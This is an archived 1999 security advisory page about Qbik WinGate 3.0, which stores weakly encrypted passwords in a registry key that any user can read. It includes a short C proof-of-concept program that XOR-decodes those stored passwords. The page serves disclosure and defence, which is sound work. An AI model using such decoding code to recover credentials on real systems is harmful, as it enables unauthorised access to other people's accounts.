Qbik WinGate Registry Vulnerability

BID:511

Info

Qbik WinGate Registry Vulnerability

Bugtraq ID: 511
Class: Design Error
CVE:
Remote: No
Local: Yes
Published: Feb 22 1999 12:00AM
Updated: Feb 22 1999 12:00AM
Credit: eEye Security Advisory AD02221999 published Feb 2, 1999. Exploit code written by Chris <[email protected]> and Mike <[email protected]> of eEye.
Vulnerable: Qbik WinGate 3.0
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 4.0
Not Vulnerable:

Discussion

Qbik WinGate Registry Vulnerability

WinGate stores encrypted passwords in the registry, in a subkey where Everyone has Read access by default. The encryption scheme is weak, and therefore anyone can get and decrypt them.

Exploit / POC

Qbik WinGate Registry Vulnerability

#include "stdafx.h"
#include <stdio.h>
#include <string.h>

main(int argc, char *argv[]) {
char i;

for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;

}

Solution / Fix

Qbik WinGate Registry Vulnerability

Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].

References

Qbik WinGate Registry Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report